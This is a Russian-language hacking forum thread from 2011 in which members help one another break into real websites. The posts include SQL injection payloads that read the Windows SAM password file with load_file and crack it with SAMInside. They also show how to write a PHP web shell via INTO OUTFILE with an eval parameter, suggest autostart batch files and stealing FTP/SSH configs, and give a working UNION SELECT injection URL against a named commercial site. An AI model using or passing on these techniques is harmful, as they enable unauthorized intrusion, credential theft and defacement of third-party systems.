HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16051  
Старый 06.01.2011, 18:22
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от Chest3r  
Chest3r said:
Люююди! Товарищи! Родимые! ААААаааа! Я ЧИТАЮ ФАЙЛ ИМЕННО ИЗ ПАПКИ C:\WINDOWS\REPAIR\! Я ЗНАЮ, ЧТО ИЗ ПАПКИ C:\WINDOWS\SYSTEM32\CONFIG\ ЕГО НЕ ВЫТАЩИТЬ, ПОТОМУ ЧТО ОН ОТКРЫТ СИСТЕМОЙ! Уже второй человек мне об этом говорит! Я же упомянул выше, что я знаю, что нужно открывать именно C:\WINDOWS\repair\SAM. Праздники же закончились!
Подскажи, пожалуйста, где почитать о "заливке и поднятии RDP" посредством SQL-иньекции в скрипте находящегося под управлением MySQL5 базирующемся на Windows Server 2003? Спасибо!
Через MySQL залить можно, а вот выполнить нет.

Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так

Код:
Code:
SELECT c FROM t UNION ALL SELECT '' INTO OUTFILE 'путь_до_каталога_видного_из_веба/название.расширение'
и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo() ;

Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.
 
Ответить с цитированием

  #16052  
Старый 06.01.2011, 20:28
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

2Chest3r залей шелл , и потом пофантазируй как и что можно ...

напрмиер можно батник засунуть в автозагрузку и ждать ребута (или найти вариант ребутнуть сервак) или.... с шелла можешь уже поковырять все конфиги (если прав будет) и там уже будет видно ...

P.S мб словишь конфиги к ftp/ssh/etc...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #16053  
Старый 06.01.2011, 21:30
Chest3r
Новичок
Регистрация: 14.11.2009
Сообщений: 2
Провел на форуме:
7499

Репутация: 0
По умолчанию

Вобщем, дело сделано, но частично. Отдельное спасибо товарищам CodeSender, Ponchik и ornot!

А дело было так! Первоначально файл был прочитан путем хексирования в SQL-запросе - hex(load_file(0x633a5c77696e646f77735c726570616972 5c73616d)) , далее сохранил страницу в браузере полностью, открыл в блокноте, обрезал лишнее, а потом конвертировал всю эту муть в HEX-редакторе.

Далее файл успешно был скормлен программе SAMInside, однако эта программка как и следовало ожидать, еще и потребовала файл SYSTEM. Тут к сожалению облом - файл весит почти 4 мегабайта и на странице ничего не отображается. Есть какие нибудь идеи по этому поводу? Порылся по разным форумам, нигде не встретилось чтение большого файла через SQL-иньекцию.

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
Через MySQL залить можно, а вот выполнить нет.
Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так
Код:
Code:
SELECT c FROM t UNION ALL SELECT '' INTO OUTFILE 'путь_до_каталога_видного_из_веба/название.расширение'
и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo() ;
Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.
Спасибо! Обязательно попробую.

Цитата:
Сообщение от shell_c0de  
shell_c0de said:
P.S мб словишь конфиги к ftp/ssh/etc...
О_о Классная идея! Почему раньше об этом не подумал... Спасибо!
 
Ответить с цитированием

  #16054  
Старый 06.01.2011, 22:04
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

я не знаю может ли такое даже работать, но попробуй например обрезать какнибудь.

substring(LOAD_FILE(''),1,1000) если получится то просто скрипт написать и вытащить потихоньку
 
Ответить с цитированием

  #16055  
Старый 06.01.2011, 22:18
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от ALIM  
ALIM said:
атипичная скуль, не могу разкрутить
http://www.masterpiecedistribution.com/shop/ultime_uscite.php?order_id=&id=22381 and 1=1 --
Как-то я не особо понял что там такого сложного

Код:
Code:
http://www.masterpiecedistribution.com/shop/ultime_uscite.php ?order_id= &id=-22381 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- 1
 
Ответить с цитированием

  #16056  
Старый 06.01.2011, 22:39
USERDEAD
Guest
Сообщений: n/a
Провел на форуме:
1305

Репутация: 0
По умолчанию

Вопрос про уязвимость

На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь
 
Ответить с цитированием

  #16057  
Старый 06.01.2011, 23:26
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Цитата:
Сообщение от USERDEAD  
USERDEAD said:
На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь
у меня классная идея!!! залить php скрипт!

P.S если без шуток то залей шелл и порутай сервак )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #16058  
Старый 07.01.2011, 01:46
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Цитата:
Сообщение от NemTaq  
NemTaq said:
вбил ковычку get запросом, появилась такая ошибка:
возможно ли провести атаку через эту ошибку?
да.......
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #16059  
Старый 07.01.2011, 20:03
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

следующий вопрос.

Имеем инъекцию, будем считать, что нам ничего не мешает раскрутить ее и получить логин,хэш админа.

Но бывает так, что эти действия бесполезны,т.к. админка находится не на самом уязвимом ресурсе, а на хостере, напримеР, http://www.vul-sait.com:2082/

То есть в админку нам не попасть.

Тут и возникают несколько вопросов.

Может быть все таки можно что то делать дальше?

Если не попасть в админку, то как посредством sql через инъекцию редактировать/слить БД, сделать дефейс ну и т.д....всевозможные действия..?
 
Ответить с цитированием

  #16060  
Старый 07.01.2011, 20:08
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

а может там всё таки просто есть админка, но ты её найти не можешь?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ